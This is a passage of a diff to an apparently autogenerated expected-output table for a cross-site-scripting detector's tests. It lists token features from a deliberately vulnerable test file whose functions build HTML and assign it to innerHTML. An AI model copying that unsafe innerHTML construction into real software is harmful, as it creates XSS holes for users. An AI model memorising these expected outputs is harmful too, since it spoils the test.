innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:39 | "" + s | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:28:28:39 | "" + s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:39:28:39 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:39:28:39 | s | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:39:28:39 | s | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | @@ -22966,6 +151532,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:43:28:51 | "" | enclosingFunctionName | sanitizedHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:43:28:51 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:28:43:28:51 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:12 | document | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:12 | document | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:26 | documen ... elector | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:26 | documen ... elector | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | documen ... tized") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | documen ... tized") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | documen ... tized") | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | documen ... tized") | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | documen ... tized") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | exceptional return of documen ... tized") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | exceptional return of documen ... tized") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | exceptional return of documen ... tized") | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | exceptional return of documen ... tized") | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:40 | exceptional return of documen ... tized") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:50 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:50 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:50 | documen ... nerHTML | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:50 | documen ... nerHTML | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:50 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:57 | documen ... = html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:57 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:57 | documen ... = html | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:57 | documen ... = html | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:5:29:57 | documen ... = html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:14:29:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:14:29:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:14:29:26 | querySelector | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:14:29:26 | querySelector | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:14:29:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:28:29:39 | "#sanitized" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:28:29:39 | "#sanitized" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:28:29:39 | "#sanitized" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22974,24 +151575,182 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:28:29:39 | "#sanitized" | enclosingFunctionName | sanitizedHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:28:29:39 | "#sanitized" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:28:29:39 | "#sanitized" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:42:29:50 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:42:29:50 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:42:29:50 | innerHTML | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:42:29:50 | innerHTML | enclosingFunctionName | sanitizedHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:42:29:50 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:54:29:57 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:54:29:57 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:54:29:57 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:54:29:57 | html | enclosingFunctionBody | s html striptags s document querySelector #sanitized innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:54:29:57 | html | enclosingFunctionName | sanitizedHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:29:54:29:57 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:17 | module.exports.ts | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:17 | module.exports.ts | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:17 | module.exports.ts | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:38 | module. ... typed") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:38 | module. ... typed") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:1:32:38 | module. ... typed") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:8:32:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:8:32:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:8:32:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:16:32:17 | ts | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:16:32:17 | ts | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:16:32:17 | ts | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:27 | require | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:27 | require | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | exceptional return of require("./typed") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | exceptional return of require("./typed") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | exceptional return of require("./typed") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | require("./typed") | assignedToPropName | ts | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | require("./typed") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | require("./typed") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:21:32:38 | require("./typed") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:29:32:37 | "./typed" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:29:32:37 | "./typed" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:29:32:37 | "./typed" | calleeImports | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:29:32:37 | "./typed" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:29:32:37 | "./typed" | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:32:29:32:37 | "./typed" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:21 | module. ... .jquery | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:21 | module. ... .jquery | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:21 | module. ... .jquery | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:50 | module. ... lugin") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:50 | module. ... lugin") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:1:34:50 | module. ... lugin") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:8:34:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:8:34:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:8:34:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:16:34:21 | jquery | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:16:34:21 | jquery | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:16:34:21 | jquery | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:31 | require | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:31 | require | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | exceptional return of require ... lugin") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | exceptional return of require ... lugin") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | exceptional return of require ... lugin") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | require ... lugin") | assignedToPropName | jquery | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | require ... lugin") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | require ... lugin") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:25:34:50 | require ... lugin") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:33:34:49 | "./jquery-plugin" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:33:34:49 | "./jquery-plugin" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:33:34:49 | "./jquery-plugin" | calleeImports | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:34:33:34:49 | "./jquery-plugin" | contextFunctionInterfaces | 